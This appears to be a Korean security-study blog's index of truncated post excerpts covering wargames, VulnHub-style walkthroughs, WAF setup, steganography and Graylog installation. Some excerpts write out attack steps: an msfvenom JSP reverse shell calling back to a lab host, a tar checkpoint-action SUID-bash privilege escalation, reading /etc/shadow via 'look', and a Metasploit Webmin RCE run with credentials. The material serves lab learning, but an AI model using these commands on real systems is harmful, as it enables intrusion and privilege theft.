MIN

OverTheWire Wargames는 해킹과 보안 기술을 익히고 연습할 수 있도록 설계된 온라인 게임 플랫폼이다. 다양한 난이도의 챌린지를 해결하면서 리눅스 명령어, 웹 보안, 리버스 엔지니어링, 암호학 등 다양한 컴퓨터 보안 개념을 배울 수 있다. https://overthewire.org/wargames/ Wargames The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. To find out m" data-og-host="overthewire.org" data-og-source-url="https://over..

msfvenom: 리버스쉘을 만드는 도구입니다. 이 도구는 원하는 모양과 기능을 가진 백도어를 만들어 줍니다.-p java/jsp_shell_reverse_tcp: 백도어의 종류를 정하는 부분입니다.java/jsp: "이 백도어는 자바 웹사이트에 심을 거야" 라고 지정하는 것입니다.shell_reverse_tcp: "백도어가 심어진 컴퓨터가 나에게 거꾸로 연락을 하도록 만들어줘"라는 기능입니다.LHOST=192.168.16.103 LPORT=7777: 백도어가 연락할 주소를 지정하는 부분입니다.LHOST=192.168.16.103: "백도어는 192.168.16.103 이 주소로 연락해야 해"LPORT=7777: "연락할 때 포트 번호는 7777번을 사용해야 해"-f war -o revshell.war..

fcrackzip은 ZIP 파일의 비밀번호를 해독하는 도구로써,무차별 대입 공격(Brute-force attack) 이나,사전 공격(Dictionary attack)방식을 사용해서 비밀번호를 찾아낸다. 파이썬의 pty 모듈을 이용해 /bin/bash라는 새로운 터미널 세션을 생성→ 불안정한 셸 세션 위에서 완전한 기능을 갖춘 /bin/bash 셸을 다시 생성하여, 더 안정적이고 사용하기 편리한 터미널 환경 구축 look:이 명령어는 특정 단어를 사전 파일(words)에서 찾아주는 리눅스 유틸리티로써, 특정 조건과 옵션을 결합하면 이 명령어가 파일의 내용을 읽는 데 악용될 수 있다. look 명령어와 함께 LFILE=/etc/shadow를 사용하는 것은 look ..

WAF (Web Application Firewall)phase: 1 → request, headerphase: 2 → phase1 + bodyphase: 3 → phase2 + respond headerphase: 4 → phase3 + respond body # ModSecurity 모듈과 Apache 개발 도구를 설치[root@localhost ~] dnf install mod_security httpd-devel# 설치된 ModSecurity 모듈이 Apache 웹 서버에 잘 로드되었는지 확인[root@localhost ~] httpd -M | grep security# mod_security.conf의 path 확인[root@localhost ~] ls /etc/httpd/conf.d/READ..

myadmin#p4szw0r4d compress 파일 이용echo "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" > shell.shecho "" > "--checkpoint-action=exec=sh shell.sh"echo "" > --checkpoint=1ls -alh./compresscd /tmp./bash -p https://www.infosecarticles.com/keyring-vulnhub-walkthrough/

웹 쉘 말고 다른 방법으로 root 권한 획득하기 : MSF6 Console로 접속하기 msf6 > use exploitt/linux/http/webmin_packageup_rce msf6 exploit > show optionsmsf6 exploit > set rhosts 192.168.16.52msf6 exploit > set lhost 192.168.16.103 (kali ip)msf6 exploit > set username adminmsf6 exploit > set password tokiohotelmsf6 exploit > set ssl truemsf6 exploit > show optionsmsf6 exploit > run 다음 과정을 거치면 root 권한 획득 가능

여기서, 스테가노그래피란? 스테가노그래피는 '비밀 통신' 기술의 한 종류로, 메시지나 파일을 다른 파일(예: 사진, 오디오, 동영상) 안에 숨겨서, 겉으로 보기에는 아무런 이상이 없는 것처럼 보이게 하는 기술입니다.암호화(Cryptography)와는 어떻게 달라?암호화: 메시지를 알아볼 수 없는 형태로 '변형' 합니다.예: "안녕" -> "x7d#kL2"메시지 자체가 숨겨지지는 않기 때문에, 누군가 암호화된 메시지를 발견하면 "이건 비밀 메시지구나"라고 알아차릴 수 있습니다.스테가노그래피: 메시지 자체를 '숨깁니다'.예: "안녕"이라는 글자를 평범한 고양이 사진 안에 숨깁니다.겉으로 보면 그냥 고양이 사진일 뿐이라서, 누군가 이 파일을 보더라도 그 안에 비밀 메시지가 있다는 사실조차 알지 못합니다.어떻게..

# 시스템 시간대 설정 : 서울 (정확한 로그 시간)ljm@ljm:~$ sudo timedatectl set-timezone Asia/Seoul#메모리 맵 영역의 최대 개수를 262144로 정의 (MongoDB 정상적으로 작동하도록)ljm@ljm:~$ sudo sysctl -w vm.max_map_count=262144vm.max_map_count = 262144ljm@ljm:~$ echo "vm.max_map_count=262144" | sudo tee /etc/sysctl.d/99-graylog-datenode.confvm.max_map_count=262144# 변경 사항을 즉시 적용sudo sysctl -pljm@ljm:~$ sudo apt install -y gnupg curl# MongoDB 저..